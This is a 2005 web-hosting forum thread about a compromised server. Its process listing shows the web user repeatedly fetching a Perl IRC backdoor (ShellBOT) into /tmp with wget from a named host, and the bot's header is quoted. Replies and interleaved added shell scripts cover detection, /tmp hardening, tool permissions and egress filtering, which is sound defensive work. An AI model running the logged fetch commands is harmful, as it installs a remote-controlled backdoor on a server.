Web Hosting Talk

View Full Version : hack?


basf
02-26-2005, 05:26 AM
I found it in my process list.
I don't know what that is:

nobody 25952 0.0 0.1 3060 1416 ? S 10:20 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 25956 0.0 0.1 2308 1028 ? S 10:20 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 25957 0.0 0.1 3060 1416 ? S 10:20 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
nobody 25968 0.0 0.1 2304 1024 ? S 10:21 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 25969 0.0 0.1 3060 1416 ? S 10:21 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 25971 0.0 0.1 2304 1024 ? S 10:21 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 25972 0.0 0.1 3060 1416 ? S 10:21 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 25978 0.0 0.1 2308 1028 ? S 10:21 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 25979 0.0 0.1 3060 1416 ? S 10:21 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
nobody 25983 0.0 0.1 2308 1028 ? S 10:21 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 25984 0.0 0.1 3060 1416 ? S 10:21 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
exim 25999 0.0 0.1 3716 1436 ? S 10:22 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody 26002 0.0 0.1 2304 1024 ? S 10:22 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 26003 0.0 0.1 3060 1416 ? S 10:22 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 26008 0.0 0.1 2308 1028 ? S 10:22 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 26009 0.0 0.1 3060 1416 ? S 10:22 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
nobody 26011 0.0 0.4 9852 4400 ? S 10:22 0:00 /servers/apache/bin/httpd
exim 26019 0.0 0.1 3716 1436 ? S 10:23 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody 26020 0.2 0.5 9396 4544 ? S 10:23 0:00 /servers/apache/bin/httpd
nobody 26027 0.0 0.1 2304 1024 ? S 10:23 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 26028 0.0 0.1 3060 1416 ? S 10:23 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 26033 0.0 0.1 2308 1028 ? S 10:23 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 26034 0.0 0.1 3060 1416 ? S 10:23 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379
exim 26041 0.0 0.1 3716 1436 ? S 10:23 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody 26045 0.0 0.1 2304 1024 ? S 10:24 0:00 sh -c wget felicidade.punhetodromo.com.br -O /tmp/php5378;per
nobody 26046 0.0 0.1 3060 1416 ? S 10:24 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody 26049 0.0 0.1 2308 1028 ? S 10:24 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
nobody 26050 0.0 0.1 3060 1416 ? S 10:24 0:00 wget infelicidade.punhetodromo.com.br -O /tmp/php5379



What should I do?
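The listing above has a pattern worth detecting automatically: the web-server user spawning a fetch utility that writes into a world-writable directory. The following is an added example, not part of the original post, that triages a `ps aux` listing for that pattern and pulls out the remote hosts and drop paths for blocking and clean-up. The sample listing inside it is constructed from a subset of the lines posted above plus two benign lines; the user name `nobody`, the tool list and the directory list are assumptions to adjust per host.

```sh
#!/bin/sh
# Added example: triage a `ps aux` listing for a web-server user running a
# fetch utility that writes into /tmp-style directories, as in the thread.
# On a live host pipe `ps auxww` into the functions instead of sample_ps.

WEB_USER="${WEB_USER:-nobody}"                 # assumption: Apache runs as nobody
DROP_DIRS='/tmp|/var/tmp|/dev/shm'             # world-writable drop locations
FETCH_TOOLS='wget|curl|fetch|lynx|GET|ftp|tftp' # download tools to flag

# Constructed sample: a subset of the thread's listing plus two benign lines.
sample_ps() {
cat <<'EOF'
USER       PID %CPU %MEM   VSZ  RSS TTY STAT START TIME COMMAND
nobody   25952  0.0  0.1  3060 1416 ?   S    10:20 0:00 wget felicidade.punhetodromo.com.br -O /tmp/php5378
nobody   25956  0.0  0.1  2308 1028 ?   S    10:20 0:00 sh -c wget infelicidade.punhetodromo.com.br -O /tmp/php5379;
exim     25999  0.0  0.1  3716 1436 ?   S    10:22 0:00 /usr/local/exim/bin/exim-4.43-1 -bd
nobody   26011  0.0  0.4  9852 4400 ?   S    10:22 0:00 /servers/apache/bin/httpd
root     26100  0.0  0.1  3060 1416 ?   S    10:25 0:00 wget http://updates.example.invalid/list -O /var/cache/list
EOF
}

# suspicious_downloads: read a ps listing on stdin; print "PID<TAB>command"
# for every process owned by $WEB_USER whose command line runs one of the
# fetch tools and names a path inside one of the drop directories.
suspicious_downloads() {
  awk -v user="$WEB_USER" -v tools="$FETCH_TOOLS" -v dirs="$DROP_DIRS" '
    NR == 1 && $1 == "USER" { next }          # skip the ps header line
    $1 != user { next }                       # only the web-server user
    {
      cmd = ""                                # rebuild the COMMAND column (field 11 onward)
      for (i = 11; i <= NF; i++) cmd = cmd (i > 11 ? " " : "") $i
      if (cmd ~ ("(^|[ /;])(" tools ")[ ]") && cmd ~ ("(" dirs ")/"))
        print $2 "\t" cmd
    }'
}

# download_sources: from the flagged commands, print unique
# "remote-source<TAB>output-path" pairs: the hosts to block at the firewall
# and the files to remove from /tmp.
download_sources() {
  suspicious_downloads | awk '{
    src = ""; dst = ""
    for (i = 2; i <= NF; i++) {
      if ($i ~ /^(wget|curl|fetch|lynx|GET)$/ && i < NF) src = $(i + 1)
      if ($i == "-O" && i < NF) dst = $(i + 1)
    }
    sub(/;$/, "", dst)                        # strip the trailing ";" of "sh -c ...;"
    if (src != "") print src "\t" dst
  }' | sort -u
}
```

Run `ps auxww | suspicious_downloads` on the affected host; the PIDs it prints are the ones to kill, and `download_sources` gives the hostnames to block and the `/tmp` files to remove. Note that the `ps` output in the thread is cut off at 80 columns, so whatever followed `-O /tmp/php5378;per` is not visible; use `ps auxww` (or `cat /proc/PID/cmdline`) to see the full command line.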

assistanz247
02-26-2005, 06:33 AM
Hi Basf,

Delete those unwanted files in the /tmp directory and remount the /tmp and /dev/shm partitions as noexec,nosuid. Also make sure that you are running updated versions of PHP and Apache. ;)
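To check whether /tmp and /dev/shm actually carry those options, and to do the remount, here is an added example (not from the original reply). It parses a /proc/mounts-style table so it can be run against constructed input; on a live host pass the real /proc/mounts. The device names in the sample table and the fstab lines in the comments are assumptions.

```sh
#!/bin/sh
# Added example: verify that world-writable directories are mounted
# nosuid,noexec and remount them if not. Parses a /proc/mounts-style table
# (fields: device mountpoint fstype options dump pass).

# Constructed sample: /tmp is its own filesystem but lacks noexec,
# /dev/shm is already hardened, /var/tmp is not mounted separately.
sample_mounts() {
cat <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,nosuid 0 0
tmpfs /dev/shm tmpfs rw,nosuid,noexec,nodev 0 0
EOF
}

# missing_mount_opts MOUNTPOINT OPT...: read a mount table on stdin and print
# each wanted option the mountpoint lacks (nothing if all are present).
# Prints "not-a-mountpoint" when the path is not a separate filesystem,
# because `mount -o remount` cannot restrict a plain directory.
missing_mount_opts() {
  mp="$1"; shift
  awk -v mp="$mp" -v want="$*" '
    $2 == mp {
      found = 1
      n = split($4, o, ",")
      for (i = 1; i <= n; i++) have[o[i]] = 1
    }
    END {
      if (!found) { print "not-a-mountpoint"; exit }
      m = split(want, w, " ")
      for (i = 1; i <= m; i++) if (!(w[i] in have)) print w[i]
    }'
}

# harden_tmp: remount the live filesystems restrictively (run as root).
# Make it permanent in /etc/fstab, for example (assumed device names):
#   /dev/sda3  /tmp      ext3   defaults,nosuid,noexec,nodev  1 2
#   tmpfs      /dev/shm  tmpfs  defaults,nosuid,noexec,nodev  0 0
# If /var/tmp is a plain directory, the usual fix is to bind-mount /tmp
# onto it so it gets the same options:
#   /tmp       /var/tmp  none   bind                          0 0
harden_tmp() {
  for mp in /tmp /dev/shm; do
    mount -o remount,nosuid,noexec,nodev "$mp" || return 1
  done
}
```

Usage on a live host: `missing_mount_opts /tmp nosuid noexec < /proc/mounts`; an empty result means the mount is already restricted. One caveat: noexec only stops the kernel from executing a file on that filesystem directly. The `;per` tail on the truncated command lines above, together with the `#!/usr/bin/perl` header posted later in this thread, suggests the download was being started as `perl /tmp/php5378`, and an interpreter reading a script from a noexec filesystem is not blocked. The remount is still worth doing, but the fix is the web application that let the command run in the first place.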

zupanm
02-26-2005, 08:56 AM
Yep, it's a hack. Here is the header of the file they are trying to download:


#!/usr/bin/perl
#
# ShellBOT
# 0ldW0lf - old-wolf@zipmail.com
# - www.atrix-br.********
# - www.atrix.********
#
#
# this is my reworked B0tchZ
#
###############################
# killah... screw you :)      #
###############################


Do this. A web server does not need users other than root to run wget:

chmod 700 /usr/bin/wget

Also do the same with the compiler:

chmod 700 /usr/bin/gcc
chmod 700 /usr/bin/g++

That is, if you have the compiler installed.

dynamicnet
02-26-2005, 10:24 AM
Greetings:

In addition to securing your /tmp, /var/tmp, and /dev/shm, along with ensuring your compilers and fetch utilities like wget cannot be accessed by anybody but root, you may also want to consider the following:

Installing and configuring mod_security from http://www.modsecurity.org/

Setting up egress filtering on your firewall.

Thank you.
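Egress filtering is the one measure above that would have stopped this incident outright: the `wget` runs as `nobody`, and a rule that refuses new outbound connections from that user kills both the download and any later call-back by whatever was fetched (the IRC connection described further down the thread). The following is an added example, not from the original reply, using the iptables `owner` match on Linux. The user name `nobody`, the resolver address (an RFC 5737 documentation address) and the chain name are assumptions; by default it only prints the rules, and `apply` installs them as root.

```sh
#!/bin/sh
# Added example: egress filtering that denies NEW outbound connections from
# the web-server user while leaving other services (mail, updates) alone.
# Dry run by default; "apply" installs the rules with iptables (root).

WEB_USER="${WEB_USER:-nobody}"      # assumption: the Apache user
RESOLVER="${RESOLVER:-192.0.2.53}"  # assumption: replace with the real resolver
IPT="${IPT:-iptables}"

# egress_rules: emit the rule set. Order matters: loopback and replies to
# existing connections first, DNS to the resolver, then log and reject any
# NEW connection from the web-server user, then fall through for everyone else.
egress_rules() {
  cat <<EOF
$IPT -N EGRESS 2>/dev/null || $IPT -F EGRESS
$IPT -A EGRESS -o lo -j ACCEPT
$IPT -A EGRESS -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A EGRESS -p udp -d $RESOLVER --dport 53 -j ACCEPT
$IPT -A EGRESS -m owner --uid-owner $WEB_USER -m state --state NEW -j LOG --log-prefix "EGRESS-$WEB_USER "
$IPT -A EGRESS -m owner --uid-owner $WEB_USER -m state --state NEW -j REJECT --reject-with icmp-port-unreachable
$IPT -A EGRESS -j RETURN
$IPT -D OUTPUT -j EGRESS 2>/dev/null || true
$IPT -I OUTPUT 1 -j EGRESS
EOF
}

# blocks_web_user: sanity check that the generated rules actually reject the
# web-server user's new connections before anything is applied.
blocks_web_user() {
  egress_rules | grep -q -- "--uid-owner $WEB_USER .*-j REJECT"
}

# apply_egress_rules: run the emitted commands, aborting on the first error.
apply_egress_rules() {
  blocks_web_user || return 1
  egress_rules | sh -e
}

case "${1:-dry-run}" in
  apply)   apply_egress_rules ;;
  dry-run) egress_rules ;;
esac
```

The LOG rule is what turns this into detection as well: every blocked attempt lands in the kernel log with the `EGRESS-nobody` prefix, so a compromised script announces itself instead of quietly pulling down a bot. If PHP runs under suexec or suPHP as per-customer users rather than `nobody`, add a `--uid-owner` or `--gid-owner` rule for each of them, or put them in one group and match on that.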

Steven
02-26-2005, 12:29 PM
Are you running any outdated phpbb by chance?

Website Rob
02-26-2005, 04:49 PM
Originally posted by zupanm
Do this. A web server does not need users other than root to run wget:

chmod 700 /usr/bin/wget

Also do the same with the compiler:

chmod 700 /usr/bin/gcc
chmod 700 /usr/bin/g++

That is, if you have the compiler installed.

For wget: chmod 700 /usr/bin/wget may not be a good idea.

The reason is that with Linux FC, for example, the GET command is no longer included or necessary, as "wget" works just fine for PHP scripts running cron jobs. With permissions of 700, the clients on the server could not run their crons. One could install GET manually, but that would be going backward.


For the compiler situation, if you are running any version of WHM then do this:

WHM > Server Setup > Tweak Security > Compilers Tweak: disable for unprivileged users
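The two previous posts pull in opposite directions: zupanm's `chmod 700` on wget and the compilers shuts the web-server user out, while the reply above points out that it also shuts out customers whose cron jobs need wget. The following is an added example (not code from either poster) that audits which fetch utilities and compilers are executable by everyone and offers both restrictions: root-only (`chmod 700`) as suggested, or a dedicated group with mode 750, which denies `nobody` while letting the users who legitimately need the tool be added to the group. The tool lists and the group name are assumptions.

```sh
#!/bin/sh
# Added example: find fetch utilities and compilers that any user can run,
# then restrict them either to root (700) or to a named group (750).

# Assumed tool locations; missing files are skipped.
FETCH_BINS="${FETCH_BINS:-/usr/bin/wget /usr/bin/curl /usr/bin/lynx /usr/bin/GET /usr/bin/fetch}"
COMPILER_BINS="${COMPILER_BINS:-/usr/bin/gcc /usr/bin/g++ /usr/bin/cc /usr/bin/c++ /usr/bin/as /usr/bin/ld}"

# world_executable FILE: true if FILE exists and its "other" execute bit is
# set. Reads the mode from `ls -ld` (column 10) rather than stat(1), whose
# flags differ between GNU and BSD.
world_executable() {
  [ -e "$1" ] || return 1
  case "$(ls -ld "$1" | cut -c10)" in
    x|t) return 0 ;;
    *)   return 1 ;;
  esac
}

# audit_bins FILE...: print each existing file that non-root, non-group
# users can execute.
audit_bins() {
  for f in "$@"; do
    world_executable "$f" && echo "$f"
  done
  return 0
}

# restrict_to_root FILE...: the chmod 700 from the thread (root only).
restrict_to_root() {
  for f in "$@"; do
    [ -e "$f" ] && chmod 700 "$f"
  done
  return 0
}

# restrict_to_group GROUP FILE...: group GROUP, mode 750. Users whose cron
# jobs need the tool are added to GROUP (e.g. `usermod -a -G GROUP user`);
# the web-server user and everyone else are denied.
restrict_to_group() {
  grp="$1"; shift
  for f in "$@"; do
    [ -e "$f" ] || continue
    chgrp "$grp" "$f" && chmod 750 "$f"
  done
  return 0
}

# Typical use (as root; "fetchers" is an assumed group created beforehand):
#   audit_bins $FETCH_BINS $COMPILER_BINS
#   restrict_to_group fetchers $FETCH_BINS
#   restrict_to_root $COMPILER_BINS
```

Run `audit_bins $FETCH_BINS $COMPILER_BINS` first to see what is currently reachable, then pick the restriction per tool. Package upgrades may reset the modes, so re-run the audit after updates.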

CArmstrong
02-26-2005, 05:46 PM
More information on ShellBOT from Sophos:

Troj/Shellbot-A is a backdoor Trojan for the UNIX platform.

The Trojan connects to a preconfigured IRC server and joins a channel in which it waits for further instructions. These instructions can cause the Trojan to execute arbitrary commands or perform network floods on a specified target.